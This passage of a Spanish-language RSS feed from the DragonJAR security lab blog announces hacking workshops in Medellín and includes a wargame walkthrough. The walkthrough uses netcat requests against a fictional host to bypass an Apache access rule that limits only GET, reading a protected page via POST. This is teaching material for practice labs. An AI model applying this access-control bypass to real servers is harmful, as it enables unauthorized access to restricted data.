			<wfw:commentRss>http://labs.dragonjar.org/laboratorio-informatica-forense-entorno-de-trabajo/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Laboratorio de Informática Forense en Medellín</title>
		<link>http://labs.dragonjar.org/desarrollo-del-laboratorio-de-informatica-forense-en-medellin</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-laboratorio-de-informatica-forense-en-medellin#comments</comments>
		<pubDate>Mon, 20 Oct 2008 16:04:55 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Informática Forense]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Laboratorio]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Medellín]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=271</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Nuevamente <strong>muchas gracias</strong> a todos los asistentes a este 4° HackTaller en Medellín, que para esta oportunidad se desarrolló sobre Informática Forense con un caso práctico.</p>
<p style="text-align: center;"><img class="aligncenter" src="http://img407.imageshack.us/img407/8455/portada2jj7.jpg" alt="HackTaller en Medellín" /></p>
<p style="text-align: justify;">En el transcurso de la semana iré publicando los diferentes recursos para este laboratorio (imágen del sistema a analizar, herramientas, videos de desarrollo, manuales y documentación).</p>
<p style="text-align: justify;">Por ahora publico el registro fotográfico <img src='http://labs.dragonjar.org/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> .</p>
<h2><a href="http://www.flickr.com/photos/31597104@N06/2958010755/" target="_blank"><strong>Fotografías del 4° HackTaller en Medellín &#8211; Informática Forense</strong></a></h2>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-laboratorio-de-informatica-forense-en-medellin/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>&#8220;Rooteo&#8221; a Sauron, solución alternativa</title>
		<link>http://labs.dragonjar.org/rooteo-a-sauron-solucion-alternativa</link>
		<comments>http://labs.dragonjar.org/rooteo-a-sauron-solucion-alternativa#comments</comments>
		<pubDate>Wed, 01 Oct 2008 01:49:17 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=261</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?action=profile;u=105" target="_blank"><strong>killr00t</strong></a>, quién constantemente asiste a los diferentes laboratorios que realizamos en la ciudad de Medellín, ha realizado una solución al HackTaller Sauron.</p>
<p style="text-align: justify;">En este, hace uso de un exploit local que afecta a los<strong> <a href="http://www.kriptopolis.org/bug-kernel-linux" target="_blank">kernel 2.6.x &#8211; 2.6.24.1</a></strong>.</p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/65165639/e013e5b7/Video_Killr00t.html" target="_blank"><strong>Descargar el video demostrativo de &#8220;rooteo&#8221; como solución alternativa al HackTaller 03</strong></a>.<br />
(Video + Exploit) password: www.dragonjar.org</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/rooteo-a-sauron-solucion-alternativa/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>HackTaller 03 en Medellín</title>
		<link>http://labs.dragonjar.org/hacktaller-03-en-medellin</link>
		<comments>http://labs.dragonjar.org/hacktaller-03-en-medellin#comments</comments>
		<pubDate>Fri, 26 Sep 2008 16:43:48 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=256</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Como mencioné anteriormente, estaba gestionando un lugar más adecuado para los laboratorios, por ello he logrado concordar con <a href="http://itmparatodos.itm.edu.co/index.php?option=com_content&amp;task=view&amp;id=791&amp;Itemid=30" target="_blank"><strong>Tecnosoft</strong></a> el laboratorio de mañana.</p>
<p>La idea de este primer laboratorio en dicha sede será la de incentivar el estudio e investigación en dicho campo, por esto, los asistentes serán los sysadmin, dba y webmasters de varias instituciones y proyectos</p>
<p>Por esta razón este lab estará un poco limitado en asistencia, pues como digo, la idea es primero mostrar nuestras ideas y proyectos, para poder contar con este espacio para nuestros laboratorios.</p>
<p>Por lo tanto los interesados deben enviarme un correo electrónico a <a href="mailto:4v4t4r@gmail.com">4v4t4r@gmail.com</a>.<br />
Quiero aclarar que para este primer lab se llevará a cabo el test de pentración a un aplicativo web que hemos realizado en laboratorios anteriores (SAURON), por lo tanto los que estén interesados en llevarlo a cabo pueden asistir, los que ya lo han realizado solo deben esperar hasta el próximo sabado para desarrollar el análisis forense al sistema comprometido.</p>
<p>Una vez realizado este lab, espero continuar realizandolos cada 8 días <img src="http://comunidad.dragonjar.org/Smileys/default/smiley.gif" border="0" alt="Sonrisa" />&#8230; (todo depende del interés de la comunidad <img src="http://comunidad.dragonjar.org/Smileys/default/wink.gif" border="0" alt="Gi&amp;ntilde;ar" />)</p>
<p>Mejor dicho, la idea es crear un equipo de investigadores en diferentes campos de la seguridad de la información y nada mejor para ello que contar con esta sede para este propósito. (Aula tipo académica, videobeam integrado, ventilación, internet, buenas máquinas, biblioteca, etc.).</p>
<p>Espero entonces los correo electrónicos.</p>
<p>Muchas gracias a los interesados, especialmente a <strong>Sebas</strong> por su invaluable colaboración con los laboratorios y la comunidad <img src="http://comunidad.dragonjar.org/Smileys/default/wink.gif" border="0" alt="Gi&amp;ntilde;ar" /></p>
<p><strong>Tecnosoft &#8211; Parque Tecnológico<br />
Boston (antiguo Colegio San José, ahora ITM de Boston)<br />
Cr 31 # 54 – 10<br />
Tel: (574) 4600727 ext 5548</strong></p>
<h2><strong>Hora: 1 PM</strong></p>
<p><strong>Se debe confirmar asistencia por correo electrónico, cupos limitados</strong></h2>
<p><strong>Materiales: Cuaderno de notas y/o USB</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/hacktaller-03-en-medellin/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>HackTaller 02 en Medellín</title>
		<link>http://labs.dragonjar.org/hacktaller-02-en-medellin</link>
		<comments>http://labs.dragonjar.org/hacktaller-02-en-medellin#comments</comments>
		<pubDate>Fri, 29 Aug 2008 19:48:52 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=240</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>El próximo sabado 30 de Agosto se llevará a cabo, el segundo HackTaller en la ciudad de Medellín con los miembros de la <a href="http://foro.dragonjar.us/" target="_blank">Comunidad DragonJAR</a> de esta ciudad.</p>
<p style="text-align: justify;">Para este HackTaller se realizará un Test de Intrusión de un Aplicativo Web. No se requiere un nivel de conocimientos avanzados en temas de seguridad, más si en informática en general, nociones básicas de seguridad, programación, linux y principalmente muchos deseos de aprender y compartir conocimiento.</p>
<p style="text-align: justify;">
<ul style="text-align: justify;">
<li><a href="../laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-part-i" target="_blank">Identificación de banners</a></li>
<li><a href="../laboratorios-hacking-tecnicas-y-contramedidas-enumeracion-del-objetivo-i" target="_blank">Enumeración del objetivo</a></li>
<li><a href="../laboratorios-hacking-tecnicas-y-contramedidas-scanning-i" target="_blank">Escaneo</a></li>
<li><a href="../laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-i" target="_blank">Ataques de fuerza bruta</a></li>
<li><a href="../laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Escaneo de vulnerabilidades</a></li>
<li><a href="http://www.dragonjar.org/programacion-segura" target="_blank">Análisis de código fuente</a></li>
<li>Injecciones de código y archivos</li>
<li>Explotación de vulnerabilidades</li>
<li>etc</li>
</ul>
<p style="text-align: justify;">Se recomienda además leer los laboratorios que se han publicado en la página, donde se dan algunas definiciones importantes y necesarias para el HackTaller, y donde se hace uso de algunas herramientas imprescindibles para este tipo de prácticas.</p>
<p style="text-align: justify;"><span id="more-240"></span></p>
<ul style="text-align: justify;">
<li>BackTrack</li>
<li>NetCat</li>
<li>Nmap &#8211; Nmapfe</li>
<li>Hydra</li>
<li>etc</li>
</ul>
<p style="text-align: justify;">El lugar donde se realizará el HackTaller será en la sede oficial de los Laboratorios de la Comunidad DragonJAR, <a href="http://www.netmaniavirtual.com/" target="_blank">Netmania Media Group</a>.</p>
<p style="text-align: justify;"><strong>Hora:</strong> 2 pm<br />
<strong>Valor:</strong> 1.000 pesos la hora por el servicio de computadores disponibles (este precio es el acordado por el administrador del local comercial), el HackTaller se llevará en un mínimo de 5 horas.<br />
<strong>Materiales:</strong> Deseos de aprender y compartir</p>
<p style="text-align: justify;"><strong>Notas aclaratorias: </strong>El local comercial ofrece servicios de internet a usuarios regulares, por ello se estableció cobrar las horas en que haremos uso de las máquinas. En ningún momento, yo (<a href="http://foro.dragonjar.us/profiles/4v4t4r-u90.html" target="_blank">4v4t4r</a>), o la Comunidad DragonJAR busca algún tipo de lucro económico con este HackTaller.</p>
<p style="text-align: justify;">Las máquinas, con los sistemas virtualizados, la documentación y las memorias del HackTaller, quedan abiertas y disponibles al público en general para que realicen el laboratorio en los horarios de servicio del local comercial (Lunes a Sabado de 9 am a 10 pm).</p>
<p style="text-align: justify;"><strong>IMPORTANTE:</strong><br />
Es necesario realizar previa inscripción al HackTaller enviando un correo electrónico a 4v4t4r@gmail.com (nombre o nick, e-mail de contacto)</p>
<p style="text-align: justify;">Los cupos son bastante limitados así que para este primer HackTaller se tendrá preferencia para usuarios activos de la Comunidad. Además dependiendo de la cantidad de pre-inscritos se considerará hacer dos sesiones, una por la mañana con un grupo de usuarios y una por la tarde con otro grupo.</p>
<p style="text-align: justify;"><strong>Ubicación:</strong></p>
<p style="text-align: justify;">
<p style="text-align: center;"><a href="http://img528.imageshack.us/img528/6034/netmania2px8.jpg"><img class="aligncenter" src="http://img528.imageshack.us/img528/6034/netmania2px8.th.jpg" alt="" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/hacktaller-02-en-medellin/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ciudades/Paises</title>
		<link>http://labs.dragonjar.org/ciudadespaises</link>
		<comments>http://labs.dragonjar.org/ciudadespaises#comments</comments>
		<pubDate>Mon, 18 Aug 2008 02:30:44 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Comunidad DragonJAR]]></category>
		<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=200</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Este será el espacio destinado para organizar y llevar a cabo los Laboratorios de Seguridad Informática DragonJAR por ciudades y paises.</p>
<p style="text-align: justify;">Los grupos se irán conformando desde el foro destinado para ello y aquí se plantearán los temas y se llevará registro de los mismos.</p>
<p style="text-align: justify;"><span id="more-200"></span><a href="http://comunidad.dragonjar.org/index.php?topic=275.0" target="_blank">Medellin</a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=272.0" target="_blank">Pereira</a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=159.0" target="_blank">Manizales</a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=266.0" target="_blank">Popayán</a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=267.0" target="_blank">Neiva</a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=263.0" target="_blank">Cali</a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=262.0" target="_blank">Bogotá</a></p>
<p style="text-align: justify;"><span id="msg_676" title="La gente de Ibagué que se reporte por favor en este post para organizar los grupos."><a href="http://comunidad.dragonjar.org/index.php?topic=271.0" target="_blank">Ibagué</a></span></p>
<p style="text-align: justify;"><span id="msg_663" title="La gente de Perú, que se reporte para realizar los laboratorios"><a href="http://comunidad.dragonjar.org/index.php?topic=261.0" target="_blank">Perú</a></span></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=274.0" target="_blank">Guatemala</a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=270.0" target="_blank">Venezuela</a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=265.0" target="_blank">Mexico</a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=264.0" target="_blank">Argentina</a></p>
<p style="text-align: justify;">En la ciudad de Medellín se llevó a cabo el primer HackTaller de la Comunidad (<a href="http://labs.dragonjar.org/solucion-y-seguimiento-del-hacktaller-01-dragonjar-i-de-viii" target="_blank">Registro del primer HAckTaller en Medellín</a>). Así mismo en la ciudad de Cali varios usuarios de la comunidad llevaron con éxito un laboratorio de seguridad.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/ciudadespaises/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>HackTaller 01 disponible en Netmania Media Group</title>
		<link>http://labs.dragonjar.org/hacktaller-01-disponible-en-netmania-media-group</link>
		<comments>http://labs.dragonjar.org/hacktaller-01-disponible-en-netmania-media-group#comments</comments>
		<pubDate>Wed, 13 Aug 2008 18:41:44 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Comunidad DragonJAR]]></category>
		<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=82</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Después de llevar a cabo el <a href="http://labs.dragonjar.org/hacktaller-01-en-medellin-realizado" target="_blank">HackTaller 01</a> de la <a href="http://foro.dragonjar.us/" target="_blank">Comunidad DragonJAR</a>, se pone a disposición de los interesados el espacio ofrecido por <a href="http://www.netmaniavirtual.com/" target="_blank">Netmania Media Group</a>.</p>
<p style="text-align: center;"><img style="vertical-align: middle;" src="http://img161.imageshack.us/img161/4306/netmania1zd3.jpg" alt="" width="228" height="96" /></p>
<p style="text-align: justify;"><a href="http://www.netmaniavirtual.com/" target="_blank">Netmania Media Group</a> cuenta con los sistemas virtualizados de intrusión utilizados en el <a href="http://labs.dragonjar.org/hacktaller-01-en-medellin-realizado" target="_blank">HackTaller 01</a>, además encontrarás las herramientas y material bibliográfico necesario para llevar a cabo las prácticas del mismo.</p>
<p style="text-align: justify;">De esta manera quienes no pudieron asistir al Hacktaller 01 de la Comunidad pueden hacer uso del espacio y estar al día para los próximos Talleres de la Comunidad DragonJAR.</p>
<p style="text-align: justify;"><strong>Recuerda:</strong> Netmania Media Group está ubicado en <span>la calle 43 #68-60 local 104, Medellín tel 230-4308</span></p>
<p style="text-align: center;"><a href="http://img528.imageshack.us/img528/6034/netmania2px8.jpg" target="_blank"><img src="http://img528.imageshack.us/img528/6034/netmania2px8.th.jpg" alt="" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/hacktaller-01-disponible-en-netmania-media-group/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Solución del HackTaller 01 DragonJAR (III de VIII)</title>
		<link>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-iii-de-viii</link>
		<comments>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-iii-de-viii#comments</comments>
		<pubDate>Wed, 13 Aug 2008 18:38:36 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[.htaccess]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Apache]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Netcat]]></category>
		<category><![CDATA[Proxy]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=80</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continuamos con la tercera entrega de la solución del HackTaller 01 de la Comunidad DragonJAR en formato de video.</p>
<p style="text-align: justify;">Este video tutorial fué desarrollado haciendo uso del solucionario en texto número 2 publicado por<a href="http://www.sg6.es/labs/" target="_blank"> <strong>SG6 Labs</strong></a>:</p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/50846686/95a4ef/H_ack_Taller_DragonJAR_SECGAME_03.html" target="_blank"><strong>Descargar video tutorial de resolución del HackTaller 01 de la Comunidad DragonJAR</strong></a> (SecGame: Sauron)(password: www.dragonjar.org)</p>
<p style="text-align: justify;"><strong>Herramientas necesarias:</strong></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/50821894/ef891491/nc11nt.html" target="_blank">NetCat</a></p>
<p style="text-align: justify;"><strong>Palabras claves (Documentos de interés, Definiciones):</strong></p>
<p style="text-align: justify;"><a href="http://es.wikipedia.org/wiki/Netcat" target="_blank">NetCat</a> &#8211; <a href="http://es.wikipedia.org/wiki/Servidor_web" target="_blank">Servidor Web</a> &#8211; <a href="http://es.wikipedia.org/wiki/Apache_http_server" target="_blank">Apache</a> &#8211; <a href="http://es.wikipedia.org/wiki/.php" target="_blank">PHP</a> &#8211; <a href="../laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Vulnerabilidades</a> &#8211; <a href="http://extensionesfirefox.blogspot.com/2007/07/tamper-data-edita-cabeceras-html.html" target="_blank">Tamper Data</a> &#8211; <a href="http://es.wikipedia.org/wiki/Proxy" target="_blank">Proxy</a> &#8211; <a href="http://foros.hacktimes.com/?q=node/37" target="_blank">Paros Proxy</a> &#8211; <a href="http://es.wikipedia.org/wiki/Perl" target="_blank">Perl</a> &#8211; <a href="http://mundogeek.net/archivos/2005/05/04/htaccess/" target="_blank">.HTACCESS</a> &#8211; <a href="http://trevinca.ei.uvigo.es/%7Etxapi/espanol/proyecto/superior/memoria/node42.html" target="_blank">Peticiones</a></p>
<p style="text-align: justify;">Lo primero que corresponde es analizar el comportamiento de un acceso a dicho directorio bajo unos cuantos supuestos. Cada cual lo puede hacer como más le guste, desde Mozilla con Tamper Data, con un proxy intermedio como Paros, o directamente con un nc desde la línea de comandos, aquí usaremos esta última.</p>
<p style="text-align: justify;"><span id="more-80"></span><strong>&gt; nc www.blindware.inc 80</strong><br />
GET /data/stats HTTP/1.0</p>
<p>HTTP/1.1 302 Found<br />
Date: Tue, 17 Jul 2007 09:56:15 GMT<br />
Server: Apache/2.2.4 (Fedora)<br />
Location: http://www.blindware.inc/data/error-stats.html<br />
Content-Length: 312<br />
Connection: close<br />
Content-Type: text/html; charset=iso-8859-1</p>
<p><strong>&gt; nc www.blindware.inc 80</strong><br />
GET /data/stats/index.html HTTP/1.0</p>
<p>HTTP/1.1 302 Found<br />
Date: Tue, 17 Jul 2007 09:56:15 GMT<br />
Server: Apache/2.2.4 (Fedora)<br />
Location: http://www.blindware.inc/data/error-stats.html<br />
Content-Length: 312<br />
Connection: close<br />
Content-Type: text/html; charset=iso-8859-1</p>
<p><strong>&gt; nc www.blindware.inc 80</strong><br />
GET /data/stats/ficherocualquiera HTTP/1.0</p>
<p>HTTP/1.1 302 Found<br />
Date: Tue, 17 Jul 2007 09:56:15 GMT<br />
Server: Apache/2.2.4 (Fedora)<br />
Location: http://www.blindware.inc/data/error-stats.html<br />
Content-Length: 312<br />
Connection: close<br />
Content-Type: text/html; charset=iso-8859-1</p>
<p>Primera Idea: De esta primera prueba nos debemos percatar que incluso con ficheros aleatorios, cuya probabilidad de existir en esa ruta es prácticamente 0%, nos sigue dando la misma respuesta, por tanto podemos deducir que existe un control de acceso a ese directorio por parte del propio Apache, que fuerza una redirección a la URL: <strong>http://www.blindware.inc/data/error-stats.html</strong>, o dicho de otra forma, que solicitemos el fichero que solicitemos Apache nos va a mostrar la pagina de error-stats.html</p>
<p><strong>Visto esto, veámos que información da el “error-stats.html”:</strong></p>
<p>Access to “/var/www/blindware/htdocs/data/stats/” Forbidden<br />
Your access isn’t allowed to this path<br />
HTTP METHOD RESTRICTED TO 127.0.0.1</p>
<p>Esta web nos devuelve una información relevante sobre una denegación de acceso a la que somos redirigidos siempre, por tanto, y como consejo general a menos que estemos muy familiarizados con Apache, lo que haremos será documentar qué motivos pueden llevar a Apache a generar un mensaje de este tipo. Para ello bien nos puede servir buscar en Google: <a href="http://www.google.es/search?q=access+forbidden+apache" target="_blank">Access Forbidden Apache</a>. Leyendo por encima los enlaces que aparecen, encontraremos como información relevante que es un error de Apache numerado con el número 403 y que se produce bajo ciertas circunstancias:</p>
<ul>
<li>Solicitar un directorio que no contiene índice ( index.html ) cuando la opción INDEXES está desactivada.</li>
<li>Solicitar un directorio que tiene denegado el acceso bajo todas o alguna circunstancia.</li>
</ul>
<p style="text-align: justify;">Así mismo, vemos que mediante ficheros “<strong>.htaccess</strong>” o en la propia configuración de Apache, podemos configurar una directiva denominada ErrorDocument 403 que nos redirige a una página web concreta en caso de que se produzca un error 403. Es evidente, que en nuestro escenario no estamos solicitando un directorio que no contiene índice, sino que ante cualquier fichero que solicitemos, nos produce este resultado, por tanto, a priori, nos encontraremos en el caso en el que el directorio tiene denegado el acceso y se ha asociado una cláusula ErrorDocument a él.</p>
<p>Intentemos emular por tanto el escenario, y para ello qué mejor que dirigirse al howto para control de accesos que dispone Apache y ver qué habría que introducir en su configuración para obtener un comportamiento como el que vemos en este servidor. En esta web encontraremos algún que otro ejemplo, pero uno interesante por encima del resto:</p>
<p>Order deny,allow<br />
Deny from all<br />
Allow from W.X.Y.Z</p>
<p style="text-align: justify;">Segunda Idea: de lo anterior podemos inducir que bien una cláusula bien un fichero .htaccess dentro del directorio data/stats están limitando el acceso. Y que su estructura será parecida a la siguiente:</p>
<p>ErrorDocument 403 http://www.blindware.inc/data/error-stats.html<br />
Order deny,allow<br />
Deny from all<br />
Allow from 127.0.0.1</p>
<p>La primera línea es la que marca la redirección al fichero “error-stats.html” en caso de que se produzca un acceso no autorizado. Así mismo, la cláusula “Deny from all” deniega el acceso a todos los usuarios menos a los autorizados por una cláusula “Allow” que en este caso serán los provenientes de 127.0.0.1 (localhost).</p>
<p>Con esto hemos replicado el comportamiento del escenario del nivel, ¿qué podemos hacer ahora?. Siempre tenemos 2 opciones una vez hemos conseguido conocer la estructura y replicarla bajo nuestro total control: buscar una vulnerabilidad pública o descubrirla por nosotros mismos. Desde aquí recomendamos encarecidamente el no reinventar la rueda: las listas públicas de vulnerabilidades existen para algo y es para ser usadas. Es cierto, que no siempre las vulnerabilidades existentes, y los exploits desarrollados para ellas se adaptarán 100% a nuestras necesidades, pero con diferencia nos ahorrarán mucho trabajo. Por ello, para sobrepasar esta medida de protección recomendamos buscar en Google etiquetas como las siguientes: <a href="http://www.google.es/search?q=apache+access+bypass" target="_blank">apache access bypass</a>, <a href="http://www.google.es/search?q=htaccess+bypass" target="_blank">htaccess bypass</a>, o <a href="http://www.google.es/search?q=apache+access+weakness" target="_blank">apache access weakness</a>.</p>
<p>Estas búsquedas nos devolverán un importante número de referencias a vulnerabilidades públicas en el control de accesos por parte de Apache (<a href="http://www.securityfocus.com/bid/9874" target="_blank">R1</a>, <a href="http://httpd.apache.org/docs/2.0/es/howto/auth.html" target="_blank">R2</a>).</p>
<p>De la lectura de estas fuentes, podemos suponer que es posbile que exista una vulnerabilidad de configuración en el escenario propuesto para la segunda idea. ¿Cuál sería esta vulnerabilidad? Por ejemplo, una configuración como la siguiente:</p>
<p>ErrorDocument 403 http://www.blindware.inc/data/error-stats.html<br />
&lt;LIMIT GET&gt;<br />
Order deny,allow<br />
Deny from all<br />
Allow from 127.0.0.1<br />
&lt;/LIMIT&gt;</p>
<p>Para verificarlo volvemos a hacer uso de nc desde la línea de comandos.</p>
<p><strong>&gt; nc www.blindware.inc 80</strong><br />
OPTIONS /data/stats/ HTTP/1.0</p>
<p>HTTP/1.1 200 OK<br />
Date: Tue, 17 Jul 2007 12:29:51 GMT<br />
Server: Apache/2.2.4 (Fedora)<br />
Allow: GET,HEAD,POST,OPTIONS,TRACE<br />
Content-Length: 0<br />
Connection: close<br />
Content-Type: text/html; charset=UTF-8</p>
<p><strong>&gt; nc www.blindware.inc 80</strong><br />
TRACE /data/stats/ HTTP/1.0</p>
<p>HTTP/1.1 200 OK<br />
Date: Tue, 17 Jul 2007 12:30:19 GMT<br />
Server: Apache/2.2.4 (Fedora)<br />
Connection: close<br />
Content-Type: message/http</p>
<p>TRACE /data/stats/ HTTP/1.0</p>
<p><strong>&gt; nc www.blindware.inc 80</strong><br />
PUT /data/stats/ HTTP/1.0</p>
<p>HTTP/1.1 405 Method Not Allowed<br />
Date: Tue, 17 Jul 2007 12:30:49 GMT<br />
Server: Apache/2.2.4 (Fedora)<br />
Allow: GET,HEAD,POST,OPTIONS,TRACE<br />
Content-Length: 324<br />
Connection: close<br />
Content-Type: text/html; charset=iso-8859-1</p>
<p>Efectivamente, existe una configuración incorrecta. Con sólo leer las respuestas del servidor vemos cómo únicamente es filtrado el método GET, mientras que por el contrario el método OPTIONS, TRACE o PUT son correctamente procesados por Apache. ¿Cómo se puede explotar esto?.</p>
<p>La explotación de este fallo de seguridad depende del fichero sobre el que hagamos la petición, en caso de ser un fichero procesable por un módulo de Apache, como puede ser PHP, PERL, etc, la explotación es mucho más sencilla porque los metodos OPTIONS o PUT devolverán exactamente lo mismo que un método GET en la inmensa mayoría de las ocasiones. Sin embargo, si el fichero lo procesa directamente Apache, como es el caso de los ficheros HTML con contenido estático, el único método diferente a GET que tiene el mismo resultado es POST. Por tanto, y dado que en este caso parece que lo que estamos buscando es el fichero “index.html” debemos hacer uso del método POST.</p>
<p><strong>&gt; nc www.blindware.inc 80</strong><br />
POST /data/stats/ HTTP/1.0</p>
<p>HTTP/1.1 200 OK<br />
Date: Tue, 17 Jul 2007 12:31:57 GMT<br />
Server: Apache/2.2.4 (Fedora)<br />
Last-Modified: Tue, 08 May 2007 20:46:48 GMT<br />
ETag: “a8023-4eed-8431de00?<br />
Accept-Ranges: bytes<br />
Content-Length: 20205<br />
Connection: close<br />
Content-Type: text/html; charset=UTF-8<br />
&lt;html&gt;<br />
&lt;head&gt;<br />
&lt;title&gt;Web Server Statistics for Blindware Inc.&lt;/title&gt;<br />
&lt;meta http-equiv=”Content-Type” content=”text/html; charset=ISO-8859-1? /&gt;<br />
&lt;meta name=”robots” content=”noindex,nofollow” /&gt;<br />
&lt;title&gt;Server Statistics for Blindware Inc.&lt;/title&gt;(..)</p>
<p>Efectivamente, nos devuelve el fichero index.html de forma correcta, por tanto podemos salvarlo a un fichero y leerlo localmente con cualquier navegador, viendo entre otros los siguientes datos:</p>
<p><strong>Directory Report</strong></p>
<p>This report lists the directories from which files were requested. (The figures for each directory include all of its subdirectories.)</p>
<p><strong>/web/<br />
[root directory]<br />
/data/<br />
/icons/<br />
/_controlp/</strong></p>
<p>En la sección destinada a directorios accedidos encontramos un directorio en el que no habíamos reparado y de nombre “_controlp/”.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-iii-de-viii/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Solución del HackTaller 01 DragonJAR (II de VIII)</title>
		<link>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-ii-de-viii</link>
		<comments>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-ii-de-viii#comments</comments>
		<pubDate>Wed, 13 Aug 2008 18:36:33 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Apache]]></category>
		<category><![CDATA[Logs]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Netcat]]></category>
		<category><![CDATA[Nmap]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Puertos]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>
		<category><![CDATA[Wget]]></category>
		<category><![CDATA[Wikto]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=78</guid>
